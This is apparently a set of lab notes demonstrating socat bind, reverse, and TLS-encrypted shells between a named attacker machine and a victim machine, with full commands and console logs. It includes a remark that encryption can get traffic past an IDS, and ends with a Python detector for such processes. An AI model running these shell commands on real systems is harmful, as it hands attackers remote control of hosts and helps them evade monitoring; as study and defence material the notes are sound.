§2024-11-05
How to use socat in an imaginary scenario of attacker and victim, where we are trying to get a shell on the victim's machine.
¶The IP setup
- Attack machine A: 192.168.48.239, hc4Noble.yushei.net
- Victim machine B: 192.168.16.249, mail.yushei.net
- Bind Shell
In this scenario socat will listen on a port on the victim (kali machine) and wait for a new connection.
- Victim B:
alexlai@mail:~$ cat /home/alexlai/hello.txt
I am /home/alexlai/hello.txt
Hello!!
alexlai@mail:~$ socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash
2024/11/05 11:25:25 socat[39140] W ioctl(5, IOCTL_VM_SOCKETS_GET_LOCAL_CID, ...): Inappropriate ioctl for device
2024/11/05 11:25:25 socat[39140] N listening on AF=2 0.0.0.0:4443
2024/11/05 11:25:29 socat[39140] N accepting connection from AF=2 192.168.48.239:59534 on AF=2 192.168.16.249:4443
2024/11/05 11:25:29 socat[39140] N forking off child, using socket for reading and writing
2024/11/05 11:25:29 socat[39140] N forked off child process 39141
2024/11/05 11:25:29 socat[39140] N starting data transfer loop with FDs [6,6] and [5,5]
2024/11/05 11:25:29 socat[39141] N execvp'ing "/bin/bash"
- Attack machine A:
alexlai@hc4Noble:~$ socat - TCP4:192.168.16.249:4443
# the `-` address here means standard input/output (the local terminal)
cat
alexlai@hc4Noble:~$ socat - TCP4:192.168.16.249:4443
cat /home/alexlai/hello.txt
I am /home/alexlai/hello.txt
Hello!!
- Reverse Shell
- Victim B:
alexlai@mail:~$ socat TCP4:hc4Noble.yushei.net:4443 EXEC:/bin/bash
- Attack machine A:
alexlai@hc4Noble:~$ socat -d -d TCP4-LISTEN:4443 STDOUT
2024/11/05 12:58:44 socat[61643] N listening on AF=2 0.0.0.0:4443
pwd
2024/11/05 12:58:57 socat[61643] N accepting connection from AF=2 192.168.16.249:38538 on AF=2 192.168.48.239:4443
2024/11/05 12:58:57 socat[61643] W address is opened in read-write mode but only supports write-only
2024/11/05 12:58:57 socat[61643] N using stdout for reading and writing
2024/11/05 12:58:57 socat[61643] N starting data transfer loop with FDs [6,6] and [1,1]
2024/11/05 12:58:57 socat[61643] N write(6, 0xaaaab93b3000, 4) completed
/home/alexlai
2024/11/05 12:58:57 socat[61643] N write(1, 0xaaaab93b3000, 14) completed
ls
2024/11/05 12:59:08 socat[61643] N write(6, 0xaaaab93b3000, 3) completed
build
dump-db
hello.txt
scripts
2024/11/05 12:59:08 socat[61643] N write(1, 0xaaaab93b3000, 32) completed
cat hello.txt
2024/11/05 12:59:15 socat[61643] N write(6, 0xaaaab93b3000, 14) completed
I am /home/alexlai/hello.txt
Hello!!
2024/11/05 12:59:15 socat[61643] N write(1, 0xaaaab93b3000, 38) completed
- Encrypted Bind Shell
Let's assume now that we wish to encrypt our communication with the victim, either because we don't want anyone on the network to sniff the traffic or because there is an IDS in place and this way we could get past it. We will use openssl encryption for this, which is very easy to accomplish. We start by generating a key and a certificate using the following command:
- Attack machine A:
alexlai@hc4Noble:~$ mkdir socat && cd $_
alexlai@hc4Noble:~/socat$ openssl req -newkey rsa:2048 -nodes -keyout bind.key -x509 -days 1000 -subj '/CN=yushei.net/O=YuShei LTD./C=TW' -out bind.crt
alexlai@hc4Noble:~/socat$ ls
bind.crt bind.key
alexlai@hc4Noble:~/socat$ cat bind.key bind.crt > bind.pem
alexlai@hc4Noble:~/socat$ ls -l
total 12
-rw-rw-r-- 1 alexlai alexlai 1212 Nov 5 13:16 bind.crt
-rw------- 1 alexlai alexlai 1704 Nov 5 13:16 bind.key
-rw-rw-r-- 1 alexlai alexlai 2916 Nov 5 13:18 bind.pem
Since we intend to use a bind shell it should be clear that the bind.pem file needs to be on the victim's machine, so we generate the bind.pem file on our attack machine and then transfer it to the victim. The final command we need to run on the victim's machine is the following:
- Transfer bind.pem to Victim B machine:
alexlai@mail:~$ mkdir ~/socat && cd $_
alexlai@mail:~/socat$ scp alexlai@hc4Noble.yushei.net:/home/alexlai/socat/bind.pem ./
alexlai@mail:~/socat$ ls -l
total 4
-rw-rw-r-- 1 alexlai alexlai 2916 Nov 5 13:25 bind.pem
- Setup the Victim machine B:
# verify=0: do not verify the peer certificate (the connection is encrypted, but the peer is not authenticated)
alexlai@mail:~/socat$ socat OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork EXEC:/bin/bash
- Start up Attack machine A:
alexlai@hc4Noble:~/socat$ socat - OPENSSL:192.168.16.249:4443,verify=0
2024/11/05 13:29:28 socat[61765] W refusing to set empty SNI host name
^Calexlai@hc4Noble:~/socat$ socat - OPENSSL:192.168.16.249:4443,verify=0
2024/11/05 13:29:58 socat[61766] W refusing to set empty SNI host name
ls
bind.pem
cat bind.pem
- Encrypted Reverse Shell
- Attack machine A:
alexlai@hc4Noble:~/socat$ socat -d -d OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork STDOUT
2024/11/05 13:38:26 socat[61787] N listening on AF=10 [0000:0000:0000:0000:0000:0000:0000:0000]:4443
2024/11/05 13:40:19 socat[61787] N accepting connection from AF=10 [0000:0000:0000:0000:0000:ffff:c0a8:10f9]:47286 on AF=10 [0000:0000:0000:0000:0000:ffff:c0a8:30ef]:4443
2024/11/05 13:40:19 socat[61787] N forked off child process 61792
2024/11/05 13:40:19 socat[61787] N listening on AF=10 [0000:0000:0000:0000:0000:0000:0000:0000]:4443
2024/11/05 13:40:19 socat[61792] N no peer certificate and no check
2024/11/05 13:40:19 socat[61792] N SSL proto version used: TLSv1.3
2024/11/05 13:40:19 socat[61792] N SSL connection using TLS_AES_256_GCM_SHA384
2024/11/05 13:40:19 socat[61792] N SSL connection compression "none"
2024/11/05 13:40:19 socat[61792] N SSL connection expansion "none"
2024/11/05 13:40:19 socat[61792] W address is opened in read-write mode but only supports write-only
2024/11/05 13:40:19 socat[61792] N using stdout for reading and writing
2024/11/05 13:40:19 socat[61792] N starting data transfer loop with FDs [7,7] and [1,1]
ls
build
dump-db
hello.txt
scripts
socat
2024/11/05 13:40:24 socat[61792] N write(1, 0xaaaae8c0a000, 38) completed
cat hello.txt
I am /home/alexlai/hello.txt
Hello!!
2024/11/05 13:40:35 socat[61792] N write(1, 0xaaaae8c0a000, 38) completed
- Victim machine B:
alexlai@mail:~$ socat OPENSSL:hc4Noble.yushei.net:4443,verify=0 EXEC:/bin/bash
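As an added example that is not part of the original notes, the following helper takes the defender's view of the four socat variants shown above (bind, reverse, encrypted bind, encrypted reverse): it scans a process listing for socat invocations that wire a network address to a shell and labels each one, including whether `verify=0` was used. The `ps` output it parses is a constructed sample modelled on the commands in these notes, not data captured from either machine.

```python
import os
import re
import shlex

# Constructed sample of `ps -eo pid,user,args` output (not from a real host).
SAMPLE_PS = """\
  PID USER     ARGS
  812 root     /usr/sbin/sshd -D
 1501 alexlai  socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:80
39140 alexlai  socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash
39222 alexlai  socat TCP4:hc4Noble.yushei.net:4443 EXEC:/bin/bash
40110 alexlai  socat OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork EXEC:/bin/bash
40311 alexlai  socat OPENSSL:hc4Noble.yushei.net:4443,verify=0 EXEC:/bin/bash
"""

# socat addresses look like ADDRTYPE:target,opt,opt; match network and program-spawning types.
NET_ADDR = re.compile(r"^(TCP4?|TCP6|UDP4?|UDP6|OPENSSL)(-LISTEN)?:", re.I)
SHELL_ADDR = re.compile(r"^(EXEC|SYSTEM):.*\b(bash|sh|dash|zsh|ksh)\b", re.I)


def classify(argv):
    """Label a socat argv as a shell pattern, or return None if it looks benign."""
    if not argv or os.path.basename(argv[0]) != "socat":
        return None
    addrs = argv[-2:]  # socat takes options first and exactly two addresses last
    net = [a for a in addrs if NET_ADDR.match(a)]
    shell = [a for a in addrs if SHELL_ADDR.match(a)]
    if not net or not shell:
        return None  # e.g. a plain TCP-to-TCP port relay
    n = net[0]
    direction = "bind" if "-LISTEN:" in n.upper() else "reverse"
    label = f"{'encrypted ' if n.upper().startswith('OPENSSL') else ''}{direction} shell"
    if label.startswith("encrypted") and re.search(r",verify=0(,|$)", n):
        label += " (verify=0, peer not authenticated)"
    return label


def scan_ps(text):
    """Return (pid, user, label) for every flagged process in a ps listing."""
    findings = []
    for line in text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, cmd = parts
        label = classify(shlex.split(cmd))
        if label:
            findings.append((int(pid), user, label))
    return findings
```

Running `scan_ps` over a live `ps -eo pid,user,args` listing flags the victim-side commands from this page while ignoring the benign relay and the attacker-side `-`/`STDOUT` listeners, which spawn no shell.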